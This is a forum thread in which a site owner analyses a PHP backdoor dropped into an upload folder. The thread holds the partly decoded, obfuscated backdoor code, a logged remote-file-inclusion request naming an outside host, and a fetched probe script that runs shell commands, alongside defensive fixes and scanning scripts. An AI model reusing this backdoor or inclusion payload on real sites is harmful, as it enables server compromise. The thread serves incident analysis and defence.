Hacker puzzle
 
blackmamba, 19 Jan 2009 09:55:35
Joined: 4 Mar 2008
307 posts
+163 -101
#1
Hello,
a site got hacked; somehow they managed to upload a PHP file into a 777 folder.
Through this file they could probably browse the whole www directory and modify everything that was 777. They did no damage, and I have already restored things from backups and secured the hole, but still
The contents of the malicious file are as follows:
<?php
// Important system file. Don't change anything.
if(@$_REQUEST['soulfly']=='1'){eval(gzinflate(base64_decode('[base64 payload omitted]')));}else{eval(gzinflate(base64_decode('[base64 payload omitted]')));}
?>

I manually decoded this n times down to this stage:
<?php
error_reporting(0);
set_time_limit(0);
@set_magic_quotes_runtime(0);
if(SSSSS())exit;
function SSSSS(){$SSSSS=SSSSSSS("AwA=");
$SSSSSS=@$_REQUEST[SSSSSSS("q0jLAwA=")];
if($SSSSSS){$SSSSS=$SSSSSS;
}elseif($SSSSSSS=trim(@$_REQUEST[SSSSSSS("KwQA")])){$SSSSS=SSSSSSS("K05NLErO0CvIKLAvtAUA").urlencode($SSSSSSS).SSSSSSS("U6vILLAFAA==").urlencode($_SERVER[SSSSSSS("C3L19Q9xjXd0cQkCAA==")]);
}if($SSSSS){if(($SSSSSSSS=SSSSSS(SSSSSSS("K83LLCxNLSlKTM5OLdJLyQIA"),$SSSSS))!==false){echo $SSSSSSSS;
return true;
}}return false;
}function SSSSSS($SSSSS,$SSSSSS){$SSSSSSS=SSSSSSS("AwA=");
if($SSSSSSSS=@fsockopen($SSSSS,80,$SSSSSSSSS,$SSSSSSSSSS,15)){$SSSSSSSSSSS=eval("return \"".SSSSSSS("iymKyQMA")."\";
");
if(!@fwrite($SSSSSSSS,eval("return \"".SSSSSSS("c3cNUdAHAA==")."\";
").$SSSSSS.eval("return \"".SSSSSSS("U/AICQnQN9QzAAA=")."\";
").$SSSSSSSSSSS.eval("return \"".SSSSSSS("88gvLrFSAAA=")."\";
").$SSSSS.$SSSSSSSSSSS.eval("return \"".SSSSSSS("c0xOTi0o0XXOSCwqTi2xUgAA")."\";
").$_SERVER[SSSSSSS("8wgJCYh3dHZ2DQiJd/ZwDAp2DQEA")].$SSSSSSSSSSS.eval("return \"".SSSSSSS("c0xOTi0o0fVJzEsvTUxPtVIAAA==")."\";
").$_SERVER[SSSSSSS("8wgJCYh3dHZ2DQiJ93H0cw91dHcFAA==")].$SSSSSSSSSSS.eval("return \"".SSSSSSS("Cy1OLdJ1TE/NK7FSAAA=")."\";
").$_SERVER[SSSSSSS("8wgJCYgPDXYNind0d/ULAQA=")].$SSSSSSSSSSS.eval("return \"".SSSSSSS("C0pNSy1KLbJSAAA=")."\";
").urlencode($_SERVER[SSSSSSS("8wgJCYgPDXYNig9ydXMNcg0CAA==")]).$SSSSSSSSSSS.eval("return \"".SSSSSSS("c87Py0tNLsnMz7NScM7JL04FAA==")."\";
").$SSSSSSSSSSS.$SSSSSSSSSSS)){@fclose($SSSSSSSS);
return false;
}$SSSSSSSSSSSS=0;
$SSSSSSSSSSSSS=SSSSSSS("AwA=");
$SSSSSSSSSSSSSS=SSSSSSS("AwA=");
while(!@feof($SSSSSSSS)){$SSSSSSSSSSSSS.=@fread($SSSSSSSS,2048*4);
if($SSSSSSSSSSSS===0){$SSSSSSSSSSSS=false;
if(substr($SSSSSSSSSSSSS,9,3)!=SSSSSSS("MzIwAAA=")){@fclose($SSSSSSSS);
return false;
}}if(!$SSSSSSSSSSSS){if(($SSSSSSSSSSSSSSS=strpos($SSSSSSSSSSSSS,eval("return \"".SSSSSSS("iymKyYsBYgA=")."\";
")))!==false){$SSSSSSSSSSSSSS.=substr($SSSSSSSSSSSSS,0,$SSSSSSSSSSSSSSS);
$SSSSSSS.=substr($SSSSSSSSSSSSS,$SSSSSSSSSSSSSSS+4);
$SSSSSSSSSSSSS=SSSSSSS("AwA=");
$SSSSSSSSSSSS=true;
}else{$SSSSSSSSSSSSSS.=$SSSSSSSSSSSSS;
}}else{$SSSSSSS.=$SSSSSSSSSSSSS;
$SSSSSSSSSSSSS=SSSSSSS("AwA=");
}}@fclose($SSSSSSSS);
foreach(explode(eval("return \"".SSSSSSS("i8kDAA==")."\";
"),$SSSSSSSSSSSSSS)as $SSSSSSSSSSSSSSSS){if($SSSSSSSSSSSSSSSS=trim($SSSSSSSSSSSSSSSS)){if(count($SSSSSSSSSSSSSSS=explode(SSSSSSS("swIA"),$SSSSSSSSSSSSSSSS))==2){@header($SSSSSSSSSSSSSSSS,true);
if(substr(trim($SSSSSSSSSSSSSSS[1]),0,4)==SSSSSSS("K0mtKAEA")){$SSSSSSS=preg_replace(SSSSSSS("09fIKEpNqykuSta01YhWAgA=").eval("return \"".SSSSSSS("UwcA")."\";
").SSSSSSS("i9WM0YvR14iOUwIA").eval("return \"".SSSSSSS("UwcA")."\";
").SSSSSSS("i9XStI8x0s8sBgA="),SSSSSSS("izG0jTGyr0jLs40xjjECAA=="),$SSSSSSS);
$SSSSSSS=preg_replace(SSSSSSS("07fJTS1JVMgoKSnQTS0szSyzVSpKTStKLc5Qio6zi9Wyt9PPLAYA"),SSSSSSS("s8lNLUlUyCgpKdBNLSzNLLNVKkpNK0otzlBSSM7PK0nNK7FVMjMwsFYIDfKxBQA=").urldecode($_SERVER[SSSSSSS("C3INDHUNDokPDfIEAA==")]).SSSSSSS("U7IDAA=="),$SSSSSSS);
$SSSSSSS=preg_replace(SSSSSSS("009MLsnMz7NVKk5NLErO0CvIKFDSzywGAA=="),SSSSSSS("AwA="),$SSSSSSS);
$SSSSSSS=preg_replace(SSSSSSS("089NLcnIT7FVKsgvLlHSzywGAA=="),SSSSSSS("y00tychPsVVKTy1RAgA="),$SSSSSSS);
}}}}unset($SSSSSSSSSSSSSS);
return $SSSSSSS;
}return false;
}function SSSSSSS($v){return eval(base64_decode("cmV0dXJuIGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCR2KSk7"));
}

?>


Does this make any more sense to anyone? :)
 
jankoM, 19 Jan 2009 10:10:29
Joined: 25 Sep 2007
489 posts
+74 -30
#2
All those strings like "089NLcnIT7FVKsgvLlHSzywGAA==" are (zipped and) base64-encoded... it then evals these strings, so you can't tell what it does

You can decode base64 here, for example: http://www.motobit.com/util/base64-decoder-encoder.asp

For example, the last function, the one with 7 "S", evals the string "return gzinflate(base64_decode($v));"

Replace the script with a PHP script that sends the details of whoever lands on it to your email, which is on some other server.

It depends on how the server is configured, but they could access everything your PHP can. If PHP can access the command line, then they could also have had "simulated" SSH access.
last edited by jankoM 19 Jan 2009 10:17:18
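Added example (not part of the original posts, and not the attacker's code): a static decoder in Python for the two encodings described above. It expands nested eval(gzinflate(base64_decode('...'))) wrappers and decodes the string literals passed to the seven-S helper without executing any PHP; the function names and the harmless three-layer sample are constructed for illustration.

```python
import base64
import re
import zlib

# eval(gzinflate(base64_decode('...'))) wrapper, as in the dropped file.
WRAPPER = re.compile(
    r"""eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*(['"])"""
    r"""([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*\)\s*;?"""
)


def inflate_b64(blob):
    """Equivalent of PHP gzinflate(base64_decode($v)): raw DEFLATE, no zlib header."""
    return zlib.decompress(base64.b64decode(blob), -15).decode("latin-1")


def pack(text):
    """Build a constructed sample the way PHP base64_encode(gzdeflate($s)) would."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(c.compress(text.encode("latin-1")) + c.flush()).decode()


def peel_layers(source, max_layers=50):
    """Expand eval wrappers one at a time until none remain. Nothing is executed.
    Returns (final_source, number_of_wrappers_expanded)."""
    expanded = 0
    while expanded < max_layers:
        m = WRAPPER.search(source)
        if m is None:
            break
        source = source[:m.start()] + inflate_b64(m.group(2)) + source[m.end():]
        expanded += 1
    return source, expanded


def decode_helper_strings(source, helper="SSSSSSS"):
    """Map each string literal passed to the decoding helper to its plaintext."""
    call = re.compile(re.escape(helper) + r"""\(\s*(['"])([A-Za-z0-9+/=]*)\1\s*\)""")
    decoded = {}
    for m in call.finditer(source):
        try:
            decoded[m.group(2)] = inflate_b64(m.group(2))
        except (ValueError, zlib.error):
            decoded[m.group(2)] = None  # literal is not base64 + raw DEFLATE
    return decoded


if __name__ == "__main__":
    # Constructed, harmless sample: three nested wrappers around one echo.
    sample = 'echo "harmless";'
    for _ in range(3):
        sample = "eval(gzinflate(base64_decode('" + pack(sample) + "')));"
    print(peel_layers("<?php " + sample + " ?>"))
    # Two literals taken from the decoded stage posted in this thread.
    print(decode_helper_strings('a(SSSSSSS("AwA="));b(SSSSSSS("MzIwAAA="));'))
```

The literal "MzIwAAA=" decodes to "200", which is the value the decoded stage compares against substr(...,9,3) of the HTTP response it fetches.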
 
blackmamba, 19 Jan 2009 10:20:58
Joined: 4 Mar 2008
307 posts
+163 -101
#3
Is there a way to configure httpd.conf with some regex so that PHP is disabled in all folders that start with uploads/ ?
 
blackmamba, 19 Jan 2009 12:06:13
Joined: 4 Mar 2008
307 posts
+163 -101
#4
<Directory ~ "^/var/www/html(.*?)upload(.*?)">
AddHandler default-handler php
</Directory>

this works
 
blackmamba, 19 Jan 2009 14:04:35
Joined: 4 Mar 2008
307 posts
+163 -101
#5
And this is what the logs look like:

==0d239948==============================
Request: domena.com 88.86.113.194 - - [18/Jan/2009:04:51:17 +0100] "GET /uploads/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 403 402 "-" "Mozilla/4.61 [en] (OS/2; U)" t@qwWFu5wUAAATCwdiQAAAAH "-"

this is just a failed attempt, because the site isn't on the Mambo/Joomla CMS

and the content of the xml file is this:
<html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;

Who even feels like hacking sites on a Sunday ?!?!??!
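Added example (not part of the original posts): a Python check that flags access-log lines like the one above, where a query parameter carries a remote URL or tries to set a PHP superglobal by name. The sample log lines, addresses and host names are constructed; the function name inspect_request is an assumption of this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# PHP superglobals that a legitimate request never sets by name.
SUPERGLOBALS = {"GLOBALS", "_REQUEST", "_GET", "_POST", "_COOKIE", "_SERVER", "_FILES"}

# Constructed sample lines (documentation addresses and host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Jan/2009:04:51:17 +0100] "GET /uploads/index.php?_REQUEST='
    '&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS='
    '&mosConfig_absolute_path=http://attacker.example/probe.xml?? HTTP/1.1" 403 402 '
    '"-" "Mozilla/4.61 [en] (OS/2; U)"',
    '198.51.100.7 - - [18/Jan/2009:05:02:40 +0100] "GET /index.php?page=news&ref=partner '
    'HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [18/Jan/2009:05:03:01 +0100] "GET /gallery.php?inc=ftp://attacker.example/x.txt '
    'HTTP/1.1" 200 91 "-" "Mozilla/4.61"',
]


def inspect_request(line):
    """Return None for an unremarkable line, else a dict describing the attempt."""
    m = REQUEST_LINE.search(line)
    if m is None:
        return None
    url = urlsplit(m.group(1))
    status = int(m.group(2))
    # parse_qsl percent-decodes values, so an encoded http%3A%2F%2F is caught too.
    params = parse_qsl(url.query, keep_blank_values=True)
    remote = [k for k, v in params if REMOTE_URL.match(v)]
    # "_REQUEST[option]" and "_REQUEST" both count as touching _REQUEST.
    overwrite = sorted({k.split("[")[0] for k, _ in params} & SUPERGLOBALS)
    if not remote and not overwrite:
        return None
    return {
        "path": url.path,
        "status": status,
        "remote_include_params": remote,
        "superglobal_overwrite": overwrite,
        # A 2xx/3xx answer means the request was served and the target
        # script should be reviewed; 4xx/5xx means it was refused.
        "needs_followup": status < 400,
    }


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(inspect_request(line))
```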
 
dbMG, 19 Jan 2009 14:29:11
Joined: 1 Aug 2007
346 posts
+32 -90
#6
"Who even feels like hacking sites on a Sunday ?!?!??!"
Do you think they sit next to the box and watch whether the hack will succeed LOL

Btw.
If security had been taken care of a bit better, this wouldn't be happening... There are thousands of such requests a day ... :)
last edited by dbMG 19 Jan 2009 14:30:45 (typo)
 
HeXeR, 19 Jan 2009 14:34:43
Joined: 13 Dec 2006
3489 posts
+90 -110
#7
Ah yes, little scripts? Possibly paid ones that some hacker sets up, and then they're full of evals inside :). Well, this happens with WP templates too ... :)

On a Sunday? It could have been any other day too, boredom probably ...
 
blackmamba, 19 Jan 2009 14:58:55
Joined: 4 Mar 2008
307 posts
+163 -101
#8
janko: Thanks

dbMG: thanks for the great post... you're really the man

hexer: well... :) it was on a Sunday
 
HeXeR, 19 Jan 2009 15:09:37
Joined: 13 Dec 2006
3489 posts
+90 -110
#9
Well :D

Decode it all the way and throw it out if you don't need this code; there's probably a footer or something in there, something that would discourage you from removing it. But it is advisable to remove it .... :)
 
blackmamba, 19 Jan 2009 15:22:48
Joined: 4 Mar 2008
307 posts
+163 -101
#10
Everything has already been restored from backups and the hole secured (in all directories where uploads are possible, PHP does not work. I hope that is enough). The malicious code has been removed from the server completely. The uploader already checks the MIME type, but that can be faked via the browser, so it has to be checked server-side - http://si2.php.net/finfo_file

If anyone would like to scan their server, here is a Python script.
import os

# Walk the web root and flag PHP files that contain all three markers
# typical of packed backdoors: eval(, base64_decode and gzinflate.
for root, dirs, files in os.walk("/var/www/html"):
    for name in files:
        if not name.endswith(".php"):
            continue
        path = os.path.join(root, name)
        with open(path, errors="replace") as fh:
            f = fh.read()
        if 'eval(' in f and 'base64_decode' in f and 'gzinflate' in f:
            print('stuff! [' + path + ']')
Regards
last edited by blackmamba 19 Jan 2009 15:24:51
 